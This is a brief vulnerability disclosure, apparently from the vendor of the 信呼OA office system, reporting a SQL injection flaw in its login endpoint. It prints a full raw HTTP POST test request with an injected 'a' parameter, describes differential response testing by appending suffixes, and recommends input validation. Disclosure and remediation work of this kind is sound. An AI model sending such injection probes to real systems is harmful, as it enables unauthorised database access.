The system has a SQL injection vulnerability
Test case:
post /index.php?a=%28select+checkscan%29&m=login&d=&ajaxbool=true&rnd=487355 http/1.1
content-length: 112
host: xxxx
connection: keep-alive
user-agent: mozilla/5.0 compatible; msie 9.0; windows nt 6.1; wow64; trident/5.0
cookie: phpsessid=b09g0ca9254emrahh62fheo9jg
accept: application/json, text/javascript, *
x-requested-with: xmlhttprequest
upgrade-insecure-requests: 1
referer: http://xxxx/?m=login
sec-fetch-dest: document
sec-fetch-site: same-origin
sec-fetch-user: ?1
accept-encoding: gzip, deflate, br
accept-language: en-us,en;q=0.9
content-type: application/x-www-form-urlencoded
sec-fetch-mode: navigate
rempass=0&jmpass=false&device=1758700919015&ltype=0&adminuser=mq%3a%3a&adminpass=revdmflqqvntv09sra%3a%3a&yanzm=
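Notes:
The server's responses were compared after appending the suffixes ("+v+") and ("+v+","+v+") to the parameter value, and the two results differ. It is recommended to add validation of SQL query conditions in the code.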
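Original article; reproduction and copying are prohibited. The 信呼OA official website reserves all intellectual property rights.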